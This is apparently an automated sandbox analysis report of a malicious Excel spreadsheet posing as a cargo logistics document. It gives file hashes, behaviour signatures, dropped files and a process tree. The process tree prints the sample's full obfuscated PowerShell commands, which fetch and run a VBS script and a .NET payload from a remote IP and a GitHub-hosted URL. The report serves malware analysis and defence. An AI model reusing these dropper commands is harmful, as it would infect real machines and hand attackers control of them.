Analysis

  • max time kernel
    118s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02-10-2024 01:28

General

  • Target

    02102024_0128_01102024_AMG Cargo Logistics.xls

  • Size

    1.1MB

  • MD5

    fd46a15cc540277de9cf6aab650c786d

  • SHA1

    6c01d5b481ba9f3bbd50b0e920b862bc73c86402

  • SHA256

    2b654e01c9d81cfb709768883effa81002075617b18ee66c984df588e8283477

  • SHA512

    9d18efeef19c995a9e925748e5d160bac8add4fbe16e045a6d874942b647ff1446725ddc271d5dcf469104d8cf872b4a12a46604b01c7d0d172eb57e5b86eb9e

  • SSDEEP

    12288:CmzHJEGIkqEwBYI4mwMUuzTZ2aTJwOIx2D3DERnLRmF8D93lVIum/OLGlJfTz0y8:1/KenJETJwfx2bARM8Z3CjzINS6Sv

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\02102024_0128_01102024_AMG Cargo Logistics.xls"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2164
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c POweRSHEll -EX bYpASs -Nop -w 1 -C DEvIcecRedEntiaLDEPLoYment.ExE ; IEx($(iex('[sysTEM.TExt.EncOdinG]'+[chAR]0x3A+[ChAR]0X3A+'UTF8.getStRiNG([syStEm.ConvErt]'+[chaR]0x3a+[CHaR]58+'fROMbASE64StRing('+[ChaR]34+'JGt1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpiTUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGxRQ1ptekksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmxJLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4QSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUWVBVZnBaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV1ciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1QSWltd2NwbENNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrdTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvMjAvbmV3cGljdHVyZXRvZ2V0dXBkYXRlbmV3dGhpbmdzLnRJRiIsIiRlTlY6QVBQREFUQVxuZXdwaWN0dXJldG9nZXR1cGRhdGVuZXd0aGluZy52QlMiLDAsMCk7c1RBUlQtc2xFRXAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXG5ld3BpY3R1cmV0b2dldHVwZGF0ZW5ld3RoaW5nLnZCUyI='+[cHAr]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POweRSHEll -EX bYpASs -Nop -w 1 -C DEvIcecRedEntiaLDEPLoYment.ExE ; IEx($(iex('[sysTEM.TExt.EncOdinG]'+[chAR]0x3A+[ChAR]0X3A+'UTF8.getStRiNG([syStEm.ConvErt]'+[chaR]0x3a+[CHaR]58+'fROMbASE64StRing('+[ChaR]34+'JGt1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpiTUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGxRQ1ptekksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmxJLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4QSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUWVBVZnBaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV1ciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1QSWltd2NwbENNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrdTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvMjAvbmV3cGljdHVyZXRvZ2V0dXBkYXRlbmV3dGhpbmdzLnRJRiIsIiRlTlY6QVBQREFUQVxuZXdwaWN0dXJldG9nZXR1cGRhdGVuZXd0aGluZy52QlMiLDAsMCk7c1RBUlQtc2xFRXAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXG5ld3BpY3R1cmV0b2dldHVwZGF0ZW5ld3RoaW5nLnZCUyI='+[cHAr]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8sqbo32h.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2428
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF519.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF518.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:604
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\newpicturetogetupdatenewthing.vBS"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1880
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlblY6Q09tU1BFQ1s0LDI2LDI1XS1KT2luJycpKCgnWlhmdXJsID0nKycgJysncCcrJzUnKyd5aCcrJ3QnKyd0cHM6Ly8nKydyYXcuJysnZycrJ2knKyd0aCcrJ3VidXNlJysncmNvbnRlbnQuY28nKydtJysnL04nKydvRGUnKyd0JysnZWN0TycrJ24nKycvTm9EZScrJ3RlY3RPJysnbi8nKydyZScrJ2YnKydzL2hlYWRzL21haW4vRGUnKyd0JysnYWgnKydOb3RoLScrJ1YudHh0JysncDV5OycrJyAnKydaWCcrJ2ZiYXMnKydlNicrJzQnKydDb250ZW4nKyd0ID0gKCcrJ04nKydlJysndy1PYmonKydlJysnY3QnKycgU3lzdGVtJysnLk4nKydldC5XZWJDbGllbnQpLkRvd25sb2EnKydkJysnUycrJ3RyaW5nKFpYJysnZnUnKydyJysnbCk7IFonKydYZmInKydpbmFyeUNvbicrJ3RlJysnbnQgPSBbU3lzdCcrJ2VtJysnLkNvbnZlJysncnQnKyddOjonKydGJysncm9tQmFzZTY0U3QnKydyaScrJ25nKCcrJ1pYZmInKydhc2U2NEMnKydvbnQnKydlJysnbnQpOyBaJysnWGYnKydhc3NlbWInKydsJysneScrJyAnKyc9JysnIFtSJysnZWZsZScrJ2N0JysnaW9uLkEnKydzcycrJ2VtYmwnKyd5XTo6TG9hZChaJysnWGZiaW5hcnlDb250JysnZW50KScrJzsnKycgW2RuJysnbGknKydiLicrJ0knKydPLkhvbWUnKyddOjpWJysnQScrJ0koWk0nKydjdCcrJ3h0JysnLlJUVEhHJysnRicrJ1IvMCcrJzIvNDQuNycrJzcxJysnLicrJzknKycxJysnLjQzMS8vOnB0dGhaTWMsICcrJ1onKydNJysnY2QnKydlc2F0aXZhZG9aTScrJ2MnKycsIFpNY2Rlc2F0aXZhZG9aJysnTWMnKycsIFonKydNJysnY2QnKydlcycrJ2F0aXZhZG9aJysnTWMsIFpNY1JlZ0FzbScrJ1pNYywnKycgJysnWicrJ01jWk1jLFpNYycrJ1pNYyknKS5yRVBsQUNlKCdaWGYnLFtzdHJJbmddW0NIYXJdMzYpLnJFUGxBQ2UoJ1pNYycsW3N0ckluZ11bQ0hhcl0zNCkuckVQbEFDZSgncDV5Jyxbc3RySW5nXVtDSGFyXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2604
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $enV:COmSPEC[4,26,25]-JOin'')(('ZXfurl ='+' '+'p'+'5'+'yh'+'t'+'tps://'+'raw.'+'g'+'i'+'th'+'ubuse'+'rcontent.co'+'m'+'/N'+'oDe'+'t'+'ectO'+'n'+'/NoDe'+'tectO'+'n/'+'re'+'f'+'s/heads/main/De'+'t'+'ah'+'Noth-'+'V.txt'+'p5y;'+' '+'ZX'+'fbas'+'e6'+'4'+'Conten'+'t = ('+'N'+'e'+'w-Obj'+'e'+'ct'+' System'+'.N'+'et.WebClient).Downloa'+'d'+'S'+'tring(ZX'+'fu'+'r'+'l); Z'+'Xfb'+'inaryCon'+'te'+'nt = [Syst'+'em'+'.Conve'+'rt'+']::'+'F'+'romBase64St'+'ri'+'ng('+'ZXfb'+'ase64C'+'ont'+'e'+'nt); Z'+'Xf'+'assemb'+'l'+'y'+' '+'='+' [R'+'efle'+'ct'+'ion.A'+'ss'+'embl'+'y]::Load(Z'+'XfbinaryCont'+'ent)'+';'+' [dn'+'li'+'b.'+'I'+'O.Home'+']::V'+'A'+'I(ZM'+'ct'+'xt'+'.RTTHG'+'F'+'R/0'+'2/44.7'+'71'+'.'+'9'+'1'+'.431//:ptthZMc, '+'Z'+'M'+'cd'+'esativadoZM'+'c'+', ZMcdesativadoZ'+'Mc'+', Z'+'M'+'cd'+'es'+'ativadoZ'+'Mc, ZMcRegAsm'+'ZMc,'+' '+'Z'+'McZMc,ZMc'+'ZMc)').rEPlACe('ZXf',[strIng][CHar]36).rEPlACe('ZMc',[strIng][CHar]34).rEPlACe('p5y',[strIng][CHar]39))"
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2228

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    7fb5fa1534dcf77f2125b2403b30a0ee

    SHA1

    365d96812a69ac0a4611ea4b70a3f306576cc3ea

    SHA256

    33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

    SHA512

    a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    b48e8373cd2b6fd33418ed67813ad631

    SHA1

    e2808565a14c925b661644c73041e18f0d80b894

    SHA256

    b1aac2bac201371722973d8b3cae2e47878d300da58d04c8917563fa79878809

    SHA512

    caea4216eee9c630484d3962763e1f64ad960dc60ddde6ce9456c74308aeb40e6ce1482845a36af92679c4aac246aa9db0a95ff4594cdb94116a4d4686effdae

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    0327aca7dd6e5a87ffd93a1de9b6fb1d

    SHA1

    357c20bab6ac3309dcf47a7f0cd2c807722e286d

    SHA256

    5d575f41bd2f2e487bf22b7dda5489f6262dc7326285bbf6ad12bac6cbdd12e0

    SHA512

    78c488d8c2659f355284a1d9713a4362f50271daf760f5c6c38b988d9f21f2ae8d7f575db96d8dd298069f423013771ce032526cd5626dfb5610fcfa3b59216a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\ienetworkupdateshere[1].hta

    Filesize

    8KB

    MD5

    3b1b3b94f33cff0856c9bb516b2b6ba5

    SHA1

    3e7ed62873dac8babbf2d5a5f231064f984f11e2

    SHA256

    cbb76a28dbf195b74fa1ab4d3d9c342fd57d7a7be891746ad59f6ce8cd28b021

    SHA512

    b73555f5367460333f240c50624bccde77a540128c361e7a8e7798e7cd7504b94945a3ea0f21bbecb6199ba7c5232e8eb87bc8094d512bbfa64fb1684892651f

  • C:\Users\Admin\AppData\Local\Temp\8sqbo32h.dll

    Filesize

    3KB

    MD5

    f4e716e55d76fc44d3680b49008586fc

    SHA1

    5726dd1194ad12ddeb4421b99d49d4222a31b1bf

    SHA256

    2a7f28bc2905fdb052b304026e381ac36ff470156db6a98620d3a52cdebc2f9a

    SHA512

    e2fe998fadd3ad97e3ad221d7a4b6fa667feada8c781bbf774a052d6067632f03576322e69de1194f299767c66a3548e3d054835c08a97e349881156bdc3733d

  • C:\Users\Admin\AppData\Local\Temp\8sqbo32h.pdb

    Filesize

    7KB

    MD5

    1f4f91546fd59779403ea492d74bd255

    SHA1

    bd3d558824f94ab556b67044edd3e0a4a6e11a67

    SHA256

    e903098bdf5904a3826d1b43ea9bfabd1a0178a2faed3fd2e8b84d204115cab0

    SHA512

    82985a2994d9cce88976245691f40d856fac3209953644321cff7af3d47832369fae6c9755ade6b8210e3c0e71adbcd67ca7899f4a3d9b91427c0c798c35c6e9

  • C:\Users\Admin\AppData\Local\Temp\CabED3C.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESF519.tmp

    Filesize

    1KB

    MD5

    cfff1c6bdda5d1e2ed000b93d0c0af19

    SHA1

    59f4f0ced1a798c4d5f07f8474c47c7277c770e7

    SHA256

    f6dfd2afb131f4654864b0dac0540e489b23457176b9e7ae73743a19cb4de908

    SHA512

    4dbe4130dad893d8db2ce59ce39087eb92be7448c2b6b01fc8347d86ca83821960ec1ab79ade5dfdc81fbc1336f05d234114b346f638909c7ea8fbbf0caed763

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    9af3c2f7671c1dd8813f0e55eabb7607

    SHA1

    3263cf1277243b0394bb5b25b5acbaef1d5842f6

    SHA256

    bccfc5b6d2c81da4af9a26f635209986c32b44c0de6a8f6b1a1485370792cb62

    SHA512

    5ce7c77fc586a2d3ce534176cb65a74c2750cd69e940ff9c7f2fb2130abba09f2cadf3c3e931f9c35fde84005fc165bc1342aae2fd38157a067360c309d39083

  • C:\Users\Admin\AppData\Roaming\newpicturetogetupdatenewthing.vBS

    Filesize

    284KB

    MD5

    530df3cee5771db37bb422520753d617

    SHA1

    7a68962efd7e8f0e5890376029485a192be6bd7d

    SHA256

    e2da4bdc8ddb6ea24583b91f20a533ec87de790f22f475e29efc2b86a851c764

    SHA512

    2f835e087906c1b86d0dd2b710c05a37db7d0c42c0e285c9f007565383e0a7e7e24caeaed40e244ba6f467b1b33fe86a8d230bed000f58707080de2edd2f1af2

  • \??\c:\Users\Admin\AppData\Local\Temp\8sqbo32h.0.cs

    Filesize

    474B

    MD5

    e51899cab87aeebfbc4b5895e20dcbca

    SHA1

    743d9d6f1c67e086fa834921c2ba8ad0b1362fb9

    SHA256

    ae6a9289442d29125a158a5b50e7d6fe34119062620dc283f2cf203c53445f79

    SHA512

    98dffd2eba52c71165fc2c9882ae54a92ff7eb372f319b93516aac6cd7c1ac507d571ea679d6a75f302ea4d43436e2a96c0635ebc1ec22afe4a6e9322ec02669

  • \??\c:\Users\Admin\AppData\Local\Temp\8sqbo32h.cmdline

    Filesize

    309B

    MD5

    a8293ab4710195c9c924a63ed7d7276c

    SHA1

    81c9f5db4325a2c19c00ef8eb54255ac5ac92a2e

    SHA256

    c9235d4cf43f06f240b13eda986469aa4ed8291821a2904ce3e0d1bef0d6f8bd

    SHA512

    d0b02e31ae267ee81aa5d3fd75ed5514d7a713d0710bdd1f1298b3c2d58e297b9bd359bc12fbdbd178b1c834bb404a97aa8b982a64a303e16fd747ca55cbb1ff

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF518.tmp

    Filesize

    652B

    MD5

    1ec302651a3d5dc03557082e3260b3a6

    SHA1

    5eb202c5fa93f96658a9b0946bf4235913f0e6ac

    SHA256

    5b714d68372c2183c737efa7cd1a0b5566c1a6d7965aa28ecfb2fc74d6eff0ed

    SHA512

    dec09f689b2022b59b6a526b7821d97dce052efd7763e5bcfb904c249bc6b8dbca0332adc646e355029f230d5a6763ea6df48350ef0f4def7ac1bbeb6f3cea33

  • memory/2164-1-0x000000007248D000-0x0000000072498000-memory.dmp

    Filesize

    44KB

  • memory/2164-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2164-55-0x000000007248D000-0x0000000072498000-memory.dmp

    Filesize

    44KB

  • memory/2164-17-0x00000000023E0000-0x00000000023E2000-memory.dmp

    Filesize

    8KB

  • memory/2736-16-0x00000000009D0000-0x00000000009D2000-memory.dmp

    Filesize

    8KB